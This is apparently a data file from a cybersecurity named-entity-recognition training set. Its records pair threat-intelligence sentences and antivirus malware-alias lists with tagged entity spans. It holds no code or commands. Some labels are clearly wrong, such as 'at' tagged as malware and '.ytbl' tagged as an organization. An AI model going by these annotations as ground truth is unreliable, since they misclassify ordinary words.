{"id": "cyner2_train_006427", "source": "cyner2_train"}} {"text": "A backdoor also known as: Troj.W32.Autoit!c TROJ_FILPOR.AI Backdoor.Enfourks TROJ_FILPOR.AI Trojan.Win32.Autoit.ezc 
Trojan.Win32.Autoit.ecevvi Trojan.DownLoader21.32598 Trojan.Autoit.Win32.30656 BehavesLike.Win32.Autorun.hc TR/Autoit.qhpu Trojan.Win32.Autoit.ezc Trojan:Win32/Filpor.A Win32.Trojan.Autoit.Pepf Trojan.Win32.Autoit W32/Autoit.EZC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006428", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DropperHQc.Trojan Trojan.Dropper.UUW Trojan.Dynamer.A4 W32/Trojan.YSAI-0703 Win32/Tnega.ARWO Trojan-Spy.MSIL.KeyLogger.cssc Trojan.Dropper.UUW Trojan.Win32.Drop.ewucrk Uds.Dangerousobject.Multi!c Trojan.Dropper.UUW Trojan.DownLoader1.49310 BehavesLike.Win32.Shodi.cc Trojan.Dropper.UUW Trojan.Win32.Z.Dropper.833273 Trojan-Spy.MSIL.KeyLogger.cssc TrojanDropper:Win32/FakeFlexnet.A Trojan.Dropper.UUW Trojan.Dropper.UUW Hoax.Win32.BadJoke Trj/CI.A Win32/Trojan.BO.19d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006429", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom/W32.Blocker.3262976 Trojan.MSIL.FC.4195 Win32.Trojan.WisdomEyes.16070401.9500.9943 W32/Trojan.RPCY-7702 Ransom_Blocker.R038C0DAH18 Trojan-Ransom.Win32.Blocker.juiv Trojan.Win32.Blocker.etmtcp Trojan.Win32.Z.Blocker.3262976.X Troj.Ransom.W32.Blocker!c Trojan.MulDrop7.48467 Ransom_Blocker.R038C0DAH18 Trojan[Ransom]/Win32.Blocker Trojan.MSILPerseus.D107B2 Trojan-Ransom.Win32.Blocker.juiv TrojanSpy:MSIL/Reven.A!bit Trojan/Win32.Blocker.R203232 Ransom.FileCryptor Trj/CI.A Win32.Trojan.Blocker.Aiip Trojan.MSIL.Spy Win32/Trojan.Ransom.df0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006431", "source": "cyner2_train"}} {"text": "A few weeks ago Cisco Talos became interested in just such a campaign with a smaller number of circulating email messages.", "spans": {"ORGANIZATION: Cisco Talos": [[16, 27]], "THREAT_ACTOR: campaign": [[61, 69]]}, "info": {"id": "cyner2_train_006432", "source": "cyner2_train"}} {"text": "As FileCoder was incomplete at the time of its 
discovery, we believe KeRanger is the first fully functional ransomware seen on the OS X platform.", "spans": {"MALWARE: FileCoder": [[3, 12]], "MALWARE: at": [[28, 30]], "MALWARE: KeRanger": [[69, 77]], "MALWARE: fully functional ransomware": [[91, 118]], "SYSTEM: OS X platform.": [[131, 145]]}, "info": {"id": "cyner2_train_006433", "source": "cyner2_train"}} {"text": "A backdoor also known as: BehavesLike:Win32.Malware DLOADER.Trojan SHeur.CDXP Heuristic.Malware", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006434", "source": "cyner2_train"}} {"text": "Banking trojans are among some of the biggest threats to everyday users as they directly impact the user in terms of financial loss.", "spans": {"MALWARE: Banking trojans": [[0, 15]], "MALWARE: threats": [[46, 53]], "ORGANIZATION: user": [[100, 104]]}, "info": {"id": "cyner2_train_006435", "source": "cyner2_train"}} {"text": "Remsec is a stealthy tool that appears to be primarily designed for spying purposes.", "spans": {"MALWARE: Remsec": [[0, 6]], "MALWARE: stealthy tool": [[12, 25]]}, "info": {"id": "cyner2_train_006437", "source": "cyner2_train"}} {"text": "A backdoor also known as: Flooder.Napsterokoz!ZeoO3ZzZXAQ PUA.Win32.Packer.NetExecutable-1 Flooder.Win32.Napsterokoz.a Trojan.DownLoader5.2173 Trojan-PWS.Win32.Fignotok!IK Flooder.Napsterokoz.a Flooder.Napsterokoz.a Trojan-PWS.Win32.Fignotok Flooder.IJJ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006439", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Mdropper TROJ_MDROPPR.CA Win32.Mdropper TROJ_MDROPPR.CA Trojan.Mdropper", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006440", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HackerAu3.Worm Win32.Worm.Autoit.Q Backdoor.Win32.Shark.axz!O Worm.Autoit.i Win32.Worm.Autoit.Q Worm.AutoIt.Win32.2 W32/AutoRun.fjx WORM_UTOTI.RC Win32.Worm.Sohanad.br W32/Downloader.AEEC-3989 W32.SillyDC 
Win32/Vishawon.A WORM_UTOTI.RC Worm.Win32.AutoIt.i Win32.Worm.Autoit.Q Trojan.Script.AutoIt.delira Worm.Win32.Autorun.215552.B Win32.Virus.Alman.Svhc Win32.Worm.Autoit.Q Worm.Win32.AutoIt.~MT Win32.HLLW.Autoruner.1483 W32/Downldr2.AICJ Worm/AutoRun.jsl W32/Almanahe.C Win32.Worm.Autoit.Q W32.W.AutoRun.lbrr Worm.Win32.AutoIt.i Win32.Worm.Autoit.Q Trojan/Win32.AutoRun.C97057 Worm.AutoRun.FLD I-Worm.Autoit.AC Win32/Autoit.BA Worm.AutoIT.V Worm.Win32.AutoIt W32/AutoIt.I!worm Win32/Worm.c3b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006442", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FakeuserinitQC.Trojan TrojanDownloader.Paglst.B4 Trojan.Ursu.D206A Backdoor.Graybird Win32/Adload.NOU Win.Trojan.Adload-2949 Trojan-Downloader.Win32.Adload.cfms Trojan.Win32.Adload.rhwua Trojan.Win32.A.Downloader.6381568 Adware.Win32.AdLoader.a TrojWare.Win32.Downloader.AdLoad.CFMS Trojan.DownLoad2.64118 Downloader.Adload.Win32.13800 TrojanDownloader.Adload.oqx TR/Adload.V Trojan[Downloader]/Win32.Adload.cfms TrojanDownloader:Win32/Paglst.B Troj.Downloader.W32.Adload.toiw Trojan-Downloader.Win32.Adload.cfms Downloader/Win32.Adload.R32544 TScope.Malware-Cryptor.SB Win32/TrojanDownloader.Adload.NJM Trojan-Downloader.Win32.Adload W32/Adload.CFMS!tr.dldr Trojan.PSW.Win32.QQPass.DT", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006444", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clod6d6.Trojan.587c Trojan.Downloader.JMWD Trojan.Downloader.JMWD Trojan.Boupke.A6 Trojan.Downloader.JMWD Trojan.Win32.S.Downloader.196096.A Trojan.Downloader.JMWD Trojan.Downloader.JMWD DDoS.5686 Trojan:Win32/Doschald.A Trojan.Downloader.JMWD Trj/Downloader.MDW Trojan.Win32.Downloader.au Win32/Trojan.Downloader.001", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006445", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Letbetom.Trojan Trojan-Spy.MSIL.Redator!O 
Trojan/Redator.a Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/MalwareF.LRAK Win.Trojan.Keylogger-796 Trojan-Spy.MSIL.Redator.a Trojan.Win32.Redator.cwfoqm Trojan.Win32.Z.Redator.186456 Backdoor.PePatch.Win32.36732 W32/Risk.TYVS-3062 TrojanSpy.MSIL.dwl System.Monitor.Stealthddos Trojan[Spy]/MSIL.Redator Trojan.MSIL.Krypt.2 Troj.Spy.MSIL.KeyLogger.ljvI Trojan-Spy.MSIL.Redator.a Trojan/Win32.Keylogger.R4155 TrojanSpy.MSIL.Redator Trj/CI.A MSIL/Spy.Keylogger.AK Msil.Trojan-spy.Redator.Pgcw W32/Mdrop.CRV!tr Win32/Trojan.Spy.17f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006448", "source": "cyner2_train"}} {"text": "It is this second webshell that enabled the threat actor to run a variety of commands on the compromised server.", "spans": {"MALWARE: webshell": [[18, 26]], "THREAT_ACTOR: the threat actor": [[40, 56]], "SYSTEM: the compromised server.": [[89, 112]]}, "info": {"id": "cyner2_train_006450", "source": "cyner2_train"}} {"text": "Not long ago, news appeared online of a younger sibling for the sensational vulnerability EternalBlue.", "spans": {"MALWARE: younger sibling": [[40, 55]], "VULNERABILITY: sensational vulnerability": [[64, 89]], "MALWARE: EternalBlue.": [[90, 102]]}, "info": {"id": "cyner2_train_006453", "source": "cyner2_train"}} {"text": "At the time of writing this article, the Joao downloader was being distributed via the anime-themed MMORPG Grand Fantasia offered on gf.ignitgames[.]to.", "spans": {"MALWARE: At": [[0, 2]], "MALWARE: the Joao downloader": [[37, 56]]}, "info": {"id": "cyner2_train_006454", "source": "cyner2_train"}} {"text": "DDoS tools developed by this organization use SSH weak passwords and server vulnerabilities to control many Linux chickens.", "spans": {"MALWARE: DDoS tools": [[0, 10]], "THREAT_ACTOR: organization": [[29, 41]], "SYSTEM: Linux": [[108, 113]]}, "info": {"id": "cyner2_train_006455", "source": "cyner2_train"}} {"text": "A backdoor also known as: 
Win32.Trojan.WisdomEyes.16070401.9500.9848 BehavesLike.Win64.BadFile.lm Backdoor:Win64/Syscon.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006457", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Flooder.ICQ.Raptof.01 Trojan/W32.Flooder.223744 Flooder.Raptof.ra Trojan.Flooder.ICQ.Raptof.01 IM-Flooder.W32.Raptof.01!c Trojan.Flooder.ICQ.Raptof.01 Flooder.Raptof!8im4oqjQSco Hacktool.Flooder Win32/Flooder.ICQ.Raptof.01 Win.Trojan.Raptof IM-Flooder.Win32.Raptof.01 Trojan.Win32.Raptof.dlvc Spyware.IM-Flooder.Raptof.223744[h] Trojan.Flooder.ICQ.Raptof.01 TrojWare.Win32.Flooder.ICQ.01 Trojan.Flooder.ICQ.Raptof.01 FDOS.Raptof Tool.Raptof.Win32.1 BehavesLike.Win32.Malware.dc W32/Risk.YFGX-8652 Flooder.ICQ.Raptof.01 HackTool[Flooder]/Win32.Raptof Win-Trojan/Raptof.223744 Trojan.Flooder.ICQ.Raptof.01 IMFlooder.Raptof Win32.Trojan.Raptof.Eflc Malware_fam.gw Flooder.BBR Trojan.Win32.ICQ.Raptof Win32/Trojan.Flood.be5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006458", "source": "cyner2_train"}} {"text": "This suggests that multiple actors may be using similar source code, or the malware is being customized as a service for targeted campaigns.", "spans": {"THREAT_ACTOR: multiple actors": [[19, 34]], "MALWARE: malware": [[76, 83]], "MALWARE: targeted campaigns.": [[121, 140]]}, "info": {"id": "cyner2_train_006459", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.QuastihusLTG.Trojan Worm.Jenxcus.A4 Trojan/Autoit.jh Trojan.Heur.AutoIT.10 W32/Trojan2.OIEK Win.Trojan.Autoit-581 W32.Sality.mCD7 Worm.AutoIT.Win32 BehavesLike.Win32.Dropper.jh W32/Trojan.WAFR-6845 TrojanDropper.Sysn.fg Trojan:AutoIt/Nateqj.B Trojan/Win32.Zapchast.R114120 Worm.AutoIt Trj/CI.A I-Worm.Autoit.JH Win32/Autoit.JH Win32.Worm.Autoit.Wofs Win32/Trojan.5a2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006460", "source": "cyner2_train"}} {"text": "A backdoor also known as: 
Trojan-Dropper/W32.Keylogger.2292572 RiskWare.WinActivator MSIL.Riskware.Hacktool.B Tool.Wpakill.13 Trojan.Keylogger.Win32.50652 HackTool.Win32.Wpakill W32.Hack.Tool Trojan[Spy]/MSIL.Keylogger HackTool/Win32.Wpakill.C2293432 TrojanSpy.MSIL.Keylogger TrojanSpy.Keylogger!axHWqO6gDEY", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006461", "source": "cyner2_train"}} {"text": "The attackers invested significant effort in attempting to hide the tool by changing the source code of the RAT and the RAT server, and by using an obfuscator and packer.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "MALWARE: tool": [[68, 72]], "MALWARE: RAT": [[108, 111], [120, 123]], "SYSTEM: server,": [[124, 131]], "SYSTEM: an obfuscator": [[145, 158]], "SYSTEM: packer.": [[163, 170]]}, "info": {"id": "cyner2_train_006462", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Cloddf4.Trojan.f747 Win32.Worm.P2p.Reur.P I-Worm.Reur.l.n2 W32/Reur.worm!p2p Worm.Reur.Win32.19 W32/Reur.p Worm.P2P.Reur!QrOO3e6Ele8 W32/Reur.YOAP-3596 W32.HLLW.Reur Win32/Reur.J P2P-Worm.Win32.Reur.p Win32.Worm.P2p.Reur.P Trojan.Win32.Reur.inko Win32.Worm.P2p.Reur.P Worm.Win32.Reur.S Win32.Worm.P2p.Reur.P BehavesLike.Win32.Dropper.gc W32/Reur.K Worm/Sramota.afo Worm[P2P]/Win32.Reur Worm.Reur.p.kcloud Worm:Win32/Reur.S Win32.Worm.P2p.Reur.P Trojan/Win32.HDC Worm.Reur Win32/Reur.S W32/Reur.K!worm.p2p Worm/Reur.V Worm.Win32.Reur.alHx Win32/Worm.226", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006464", "source": "cyner2_train"}} {"text": "Its main job is to send spam, but it is able to do other tasks as well.", "spans": {}, "info": {"id": "cyner2_train_006467", "source": "cyner2_train"}} {"text": "The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept POC code to install a Trojan called Emissary, which is related to the Operation Lotus Blossom campaign.", "spans": {"THREAT_ACTOR: actors": [[4, 10]], 
"VULNERABILITY: exploit": [[24, 31]], "MALWARE: proof-of-concept POC code": [[87, 112]], "MALWARE: Trojan": [[126, 132]], "MALWARE: Emissary,": [[140, 149]], "THREAT_ACTOR: Operation Lotus Blossom": [[174, 197]]}, "info": {"id": "cyner2_train_006468", "source": "cyner2_train"}} {"text": "A combination of factors made this pattern effective and successful, explaining why ITG08 has remained operational for so long.", "spans": {"THREAT_ACTOR: ITG08": [[84, 89]]}, "info": {"id": "cyner2_train_006472", "source": "cyner2_train"}} {"text": "Ploutus is one of the most advanced ATM malware families we've seen in the last few years.", "spans": {"MALWARE: Ploutus": [[0, 7]], "MALWARE: advanced ATM malware families": [[27, 56]]}, "info": {"id": "cyner2_train_006475", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win.HLLP.Sector.C Win.HLLP.Sector.C Win.HLLP.Sector.C Win.HLLP.Sector Win/HLLP.Sector.C NE_HLLP_SECTOR.C Win.HLLP.Sector.C Win.HLLP.Sector.C Trojan.Win16.HLLP.exkzou Win.Hllp.Sector!c Win.HLLP.Sector.C Win.HLLP.Sector.C Win.HLLP.Sector.18864 NE_HLLP_SECTOR.C W16/TNT.a W16/HLLP.Sector.C Backdoor:Win16/Sector.C W16/TNT.a Win32.Virus.Hllp.Akes Virus.Win.Hllp", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006476", "source": "cyner2_train"}} {"text": "Per its advertisements it is an infostealer that steals form data from various web browsers and other applications.", "spans": {"MALWARE: infostealer": [[32, 43]]}, "info": {"id": "cyner2_train_006477", "source": "cyner2_train"}} {"text": "A backdoor also known as: WS.Reputation.1 WORM_DUPTWU.SMIA Worm.Autorun-6650 Backdoor.Win32.LolBot.dyk Trojan.Downloader.JNUS Backdoor.Win32.LolBot!IK Trojan.Downloader.JNUS WORM_DUPTWU.SMIA Worm:Win32/Duptwux.A Trojan.Downloader.JNUS Backdoor/Win32.LolBot Backdoor.LolBot.ju Worm.Win32.FakeFolder.t Backdoor.Win32.LolBot W32/LolBot.DYK!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006479", "source": 
"cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Scarpnex-1 Trojan.MulDrop4.61017 Trojan[Spy]/MSIL.KeyLogger Trojan:MSIL/Scarpnex.A Trojan.Zusy.D9B94 TrojanSpy.KeyLogger!icGvcsfSy6M Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006480", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Msxrat Trojan.Win32.Z.Msxrat.522564 TR/Crypt.Xpack.wccie Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006481", "source": "cyner2_train"}} {"text": "The LOCKBIT ransomware group is one of the most notorious cyber-thieves in the world, targeting companies across Europe, the United States, India, and the Middle East in a series of attacks that began in December 2022.", "spans": {"THREAT_ACTOR: The LOCKBIT ransomware group": [[0, 28]], "THREAT_ACTOR: cyber-thieves": [[58, 71]], "ORGANIZATION: companies": [[96, 105]]}, "info": {"id": "cyner2_train_006482", "source": "cyner2_train"}} {"text": "It is unknown what is the intent behind the campaign as of this writing, however, the profile of the targets resembles those that are common targets of Advanced Persistent Threat APT actors.", "spans": {"THREAT_ACTOR: the campaign": [[40, 52]], "THREAT_ACTOR: Advanced Persistent Threat APT actors.": [[152, 190]]}, "info": {"id": "cyner2_train_006483", "source": "cyner2_train"}} {"text": "We investigated further and found that this campaign is specifically targeted to Korean sites and Korean banks.", "spans": {"THREAT_ACTOR: campaign": [[44, 52]], "ORGANIZATION: Korean banks.": [[98, 111]]}, "info": {"id": "cyner2_train_006484", "source": "cyner2_train"}} {"text": "The latest Petya-like outbreak has gathered a lot of attention from the media.", "spans": {}, "info": {"id": "cyner2_train_006486", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Ransom.Win32.Gimemo!O Trojan.PornoAsset.Win32.9310 Trojan/Gimemo.aunq 
Trojan.Symmi.D1B0C Trojan.Winlock.7482 BehavesLike.Win32.BadFile.ch Trojan/PornoAsset.ooo Trojan[Ransom]/Win32.Gimemo Trojan:Win32/Fsblock.A TScope.Trojan.VB Trojan-Dropper.Win32.Injector W32/Injector.CLTY!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006489", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9520 Win32.Trojan.Razy.Hsjc BehavesLike.Win32.BadFile.mz TR/Razy.anyu Trojan:Win32/Rekilc.C Trojan.Razy.D822B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006490", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Degrub Trojan-Spy.Win32.Delf.avce Trojan.Win32.Symmi.daxrzp Trojan.Win32.Z.Delf.731648 Troj.Spy.W32.Delf!c Trojan.Delf.Win32.64416 BehavesLike.Win32.Dropper.bh Trojan-Spy.Win32.Delf TrojanSpy.Delf.iwz TR/Spy.Delf.agiu Backdoor:Win32/Degrub.A Trojan-Spy.Win32.Delf.avce TScope.Trojan.Delf Trj/Chgt.A Win32.Trojan-spy.Delf.Akpg TrojanSpy.Delf!bLkOUU0IMLc W32/Delf.AFB!tr Win32/Trojan.Keylog.e29", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006491", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9995 Trojan.Win32.Mlw.ewygwi Backdoor.W32.Androm.mfVY Trojan.Injector.Win32.586108 TR/Dropper.MSIL.xejse Trojan.MSIL.Inject Trj/GdSda.A Win32/Trojan.e6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006492", "source": "cyner2_train"}} {"text": "A backdoor also known as: VB:Trojan.Valyria.401 Vb.Troj.Valyria!c Trojan.GQXF-6 VB:Trojan.Valyria.401 Trojan.Ole2.Vbs-heuristic.druvzi VB:Trojan.Valyria.401 VB:Trojan.Valyria.401 HEUR_VBA.E HEUR.VBA.Trojan.d TrojanDropper:O97M/SilverMob.A!dha VB:Trojan.Valyria.401 Macro.Trojan.Dropperd.Auto Trojan.VB.Valyria VB:Trojan.Valyria.401 virus.office.obfuscated.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006493", "source": "cyner2_train"}} {"text": "A backdoor 
also known as: Troj.GameThief.W32.Magania.lhJV Win32.Trojan-PSW.OLGames.ck TSPY_ONLINEG.VBY Win.Spyware.18411-2 Trojan-GameThief.Win32.OnLineGames.hmv Trojan.Win32.OnLineGames.bjsgmk TrojWare.Win32.Magania.~I Trojan.PWS.Wsgame.4325 TSPY_ONLINEG.VBY Trojan-GameThief.Win32.OnLineGames TR/CrashSystem.C Trojan[GameThief]/Win32.OnLineGames Win32.Troj.OnLimeGamesT.gs.73779 Trojan-GameThief.Win32.OnLineGames.hmv Trojan/Win32.OnlineGameHack.R96963 Trojan.Graftor.Elzob.D370C Trojan.PWS.OnLineGames!SkDSyFiZd8U", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006494", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.ProxyChanger Trojan.Banload Trojan/ProxyChanger.ik TROJ_BANLOAD.HVU W32/Trojan2.NXCH Win32/Tnega.ASRL Trojan.ProxyChanger.IK TROJ_BANLOAD.HVU Win.Trojan.Dealply-6391261-0 Trojan.DownLoad3.29408 BehavesLike.Win32.Dropper.gh W32/Trojan.YDHZ-1016 TR/ProxyChanger.H.1 Trojan/Win32.Unknown Trojan:Win32/ProxyChanger.H Trojan/Win32.ChePro.R102488 TScope.Trojan.Delf Win32/ProxyChanger.IK Trojan.ProxyChanger!NBBwWIBks/E Trojan.Crypt W32/Banloa.NX!tr Win32/Trojan.e6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006496", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Gaobot.iawc W32/Joke.OA Joke.Rosenu TROJ_SPNR.03D111 Backdoor.Pasur!NYY0BVh8dz8 TrojWare.Win32.Trojan.Chifrax.~A TROJ_SPNR.03D111 W32/Joke.ERJK-0662 Joke.Rosenu Win32/Joke.ScreenRoses Trojan.Win32.Inject Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006498", "source": "cyner2_train"}} {"text": "A family of ransomware Trojans that encrypts files and adds the extensions .xtbl and .ytbl emerged in late 2014/early 2015, and quickly established itself among the top three most widespread encryptors in Russia along with Trojan-Ransom.Win32.Cryakl and Trojan-Ransom.BAT.Scatter.", "spans": {"MALWARE: ransomware Trojans": [[12, 30]], "ORGANIZATION: .ytbl": [[85, 90]], "MALWARE: 
encryptors": [[191, 201]]}, "info": {"id": "cyner2_train_006499", "source": "cyner2_train"}} {"text": "Morphick is tracking this malware under the name ScanPOS due to the build string present in the malware.", "spans": {"ORGANIZATION: Morphick": [[0, 8]], "MALWARE: malware": [[26, 33]], "MALWARE: ScanPOS": [[49, 56]], "MALWARE: malware.": [[96, 104]]}, "info": {"id": "cyner2_train_006502", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9673 Trojan.PWS.Zhui BehavesLike.Win32.VTFlooder.mh Win32.Troj.Wow.q.kcloud Trj/QQFile.D Win32.Trojan-qqpass.Qqrob.Akon Trojan.SystemHijack!vG9DZPEgkqo", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006504", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojandownloader.Halnine Trojan.Zusy.D2FDB Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Win32.DlrSysWrtbased!M.bdazop Trojan.Win32.Z.Zusy.15872.DI TrojanDownloader:Win32/Halnine.A Win32.Trojan.Spy.Swve", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006506", "source": "cyner2_train"}} {"text": "A backdoor also known as: BehavesLike.Win64.Fake.jh Trojan.Win32.Crypt Trojan.PSW.Mimikatz.un TR/AD.Trier.sqhjh Joke:VBS/Trier.A Trj/CI.A VBS/BadJoke.AL Win32/Trojan.7be", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006507", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.FakeAV.NRC Trojan.Bampeass.B5 Trojan.FakeAV.NRC TROJ64_BAMPEASS.SM Win.Trojan.Fakeav-103064 Trojan.FakeAV.NRC Trojan.Win32.Wakme.c Trojan.FakeAV.NRC Variant.Kazy.mAdQ Trojan.FakeAV.NRC Trojan.FakeAV.Win32.316028 TROJ64_BAMPEASS.SM W64/Trojan.CZHS-5421 Trojan.Fakeav.bg TR/Bampeass.abd Trojan.FakeAV.NRC PUP.BrowseFox/Variant Trojan.Win32.Wakme.c Trojan:Win64/Bampeass.C Trojan.FakeAV.NRC Trj/CI.A Win32.Trojan.Wakme.Akew Win32/Trojan.d9f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006510", "source": "cyner2_train"}} {"text": 
"Forcepoint Security Labs™ recently investigated a trojanized RTF document which we tied to the Carbank criminal gang.", "spans": {"ORGANIZATION: Forcepoint Security Labs™": [[0, 25]], "MALWARE: trojanized": [[50, 60]], "THREAT_ACTOR: the Carbank criminal gang.": [[91, 117]]}, "info": {"id": "cyner2_train_006511", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader:PowerShell/Hipolel.A Trojan.Win32.Swrort Win32/Trojan.Downloader.c1c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006512", "source": "cyner2_train"}} {"text": "Doc with Macro that downloads Dridex", "spans": {"MALWARE: Dridex": [[30, 36]]}, "info": {"id": "cyner2_train_006513", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader/W32.Small.8704.HT TrojanDownloader.Tooki Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan Win32/Tydpec.A TROJ_DLOADER.OXH Win.Downloader.16819-1 Trojan-Spy.Win32.KeyLogger.aszl Trojan.DownLoader8.62321 TROJ_DLOADER.OXH TrojanDownloader:Win32/Tooki.A Trojan-Spy.Win32.KeyLogger.aszl Win32.Trojan-spy.Keylogger.Lpbj", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006515", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Small.16896.DU Trojan-Spy.Win32.Zbot!O Backdoor.Small.D10 Trojan.Spy.Zbot W32.Spacefam Win32/Zbot.EUI TSPY_FIFESOCK_BK082A3D.TOMC Win.Trojan.Zbot-13661 Trojan.Win32.Zbot.curnd Trojan.Win32.A.Zbot.16896 Trojan.Proxy.18997 TSPY_FIFESOCK_BK082A3D.TOMC TrojanSpy.Zbot.awmw TR/Spy.ZBot.axcq.3 Trojan[Spy]/Win32.Zbot Trojan.Razy.D7DC8 Backdoor.W32.IRCBot.liBA Spyware/Win32.Zbot.R2503 SScope.Trojan.Zbot.01428", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006518", "source": "cyner2_train"}} {"text": "Using DGA Domain Generation Algorithm to find the C C Command and Control server", "spans": {"SYSTEM: DGA Domain Generation Algorithm": [[6, 37]]}, "info": {"id": "cyner2_train_006520", "source": 
"cyner2_train"}} {"text": "We discovered a new variant of a Brazilian-made ransomware, Trojan-Ransom.Win32.Xpan, that is being used to infect local companies and hospitals, directly affecting innocent people, encrypting their files using the extension .___xratteamLucked and asking to pay the ransom.", "spans": {"MALWARE: Brazilian-made ransomware,": [[33, 59]], "ORGANIZATION: local companies": [[115, 130]], "ORGANIZATION: hospitals,": [[135, 145]]}, "info": {"id": "cyner2_train_006521", "source": "cyner2_train"}} {"text": "These investigations took place during mid-to-late 2017, and each bank compromise resulted in a significant amount of stolen funds.", "spans": {"ORGANIZATION: bank": [[66, 70]]}, "info": {"id": "cyner2_train_006522", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Molock Win32.Trojan.WisdomEyes.16070401.9500.9974 TR/Molock.nylne Trojan.Mikey.DD047 PUA.BlackMoon Win32/Trojan.2ce", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006523", "source": "cyner2_train"}} {"text": "In March 2016, Symantec published a blog on Suckfly, an advanced cyberespionage group that conducted attacks against a number of South Korean organizations to steal digital certificates.", "spans": {"ORGANIZATION: Symantec": [[15, 23]], "THREAT_ACTOR: Suckfly,": [[44, 52]], "THREAT_ACTOR: advanced cyberespionage group": [[56, 85]], "ORGANIZATION: organizations": [[142, 155]]}, "info": {"id": "cyner2_train_006524", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.RansomCryakl.Trojan Trojan.Cryakl Trojan.Ransom.Cryakl Ransom_CRYPICH.SMA Win32.Trojan.WisdomEyes.16070401.9500.9790 W32/Trojan.GTXF-0130 Ransom_CRYPICH.SMA Trojan-Ransom.Win32.Cryakl.sw Trojan.Win32.Cryakl.drogeo Trojan.Win32.Z.Filecoder.626656 Win32.Trojan.Cryakl.Ahys Trojan.Encoder.1041 Trojan.Cryakl.Win32.53 Trojan-PWS.Win32.Delf Trojan/Cryakl.ap W32.Cryakl TR/FileCoder.bikix Trojan[Ransom]/Win32.Cryakl Trojan-Ransom.Win32.Cryakl.sw 
